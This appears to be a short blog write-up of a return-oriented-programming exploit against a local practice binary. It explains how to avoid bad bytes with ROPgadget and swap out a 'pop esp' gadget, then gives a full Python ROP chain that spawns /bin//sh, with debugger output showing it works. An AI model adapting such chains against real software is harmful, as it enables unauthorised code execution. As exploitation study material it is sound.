1. Avoid bad bytes
I used "ROPgadget.py --ropchain" to generate shellcode.
However, it didn't work because of bad bytes.
p += pack('<I', 0x0809a346) # inc eax ; ret
When program loaded 0x09(\t), it won't read payload anymore
$ ../ROPgadget.py --binary ./sample --ropchain --badbytes "20|00|09"
0x20 = space, 0x00 = , 0x09 = \t
2. Don't pop esp
Bypass bad bytes, and it generate
p += pack('<I', 0x080c2105) # inc eax ; pop esp ; ret
p += pack('<I', 0x41414141) # padding
to replace
p += pack('<I', 0x0809a346) # inc eax ; ret
However, you have to add eax to 11.
first time you pop esp, and it will store 0x41414141.
Next time you pop, it will access(pop) the value stored in 0x41414141
and get nothing!
Chain it by yourself!
$ ../ROPgadget.py --binary ./sample | grep "inc eax"
and find this one
0x0805083c : inc eax ; pop edi ; ret
It change $edi to 0x41414141, better!
#!/usr/bin/env python2 # execve generated by ROPgadget from struct import pack # Padding goes here p = 'a'*32 # buff[20] p += pack('<I', 0x08056fba) # pop edx ; ret p += pack('<I', 0x080ef060) # @ .data p += pack('<I', 0x080c2156) # pop eax ; ret p += '/bin' p += pack('<I', 0x0808e77d) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08056fba) # pop edx ; ret p += pack('<I', 0x080ef064) # @ .data + 4 p += pack('<I', 0x080c2156) # pop eax ; ret p += '//sh' p += pack('<I', 0x0808e77d) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08056fba) # pop edx ; ret p += pack('<I', 0x080ef068) # @ .data + 8 p += pack('<I', 0x080513d0) # xor eax, eax ; ret p += pack('<I', 0x0808e77d) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x080481ec) # pop ebx ; ret p += pack('<I', 0x080ef060) # @ .data p += pack('<I', 0x080e3a8e) # pop ecx ; ret p += pack('<I', 0x080ef068) # @ .data + 8 p += pack('<I', 0x08056fba) # pop edx ; ret p += pack('<I', 0x080ef068) # @ .data + 8 p += pack('<I', 0x080513d0) # xor eax, eax ; ret p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret p += pack('<I', 0x41414141) # padding p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret p += pack('<I', 0x41414141) # padding p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret p += pack('<I', 0x41414141) # padding p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret p += pack('<I', 0x41414141) # padding p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret p += pack('<I', 0x41414141) # padding p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret p += pack('<I', 0x41414141) # padding p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret p += pack('<I', 0x41414141) # padding p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret p += pack('<I', 0x41414141) # padding p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret p += pack('<I', 0x41414141) # padding p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret p += pack('<I', 0x41414141) # padding p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret p += pack('<I', 0x41414141) # padding p += pack('<I', 0x080493b9) # int 0x80 print p
Mission complete! [---------------------------registers-----------------------------------] EAX: 0xb ('\x0b') EBX: 0x80ef060 ("/bin//sh") ECX: 0x80ef068 --> 0x0 EDX: 0x80ef068 --> 0x0 ESI: 0x0 EDI: 0x41414141 ('AAAA') EBP: 0x61616161 ('aaaa') ESP: 0xbffff2dc --> 0x0 EIP: 0x80493b9 (: int 0x80) EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [----------------------------------------------------------------------]
Advertisements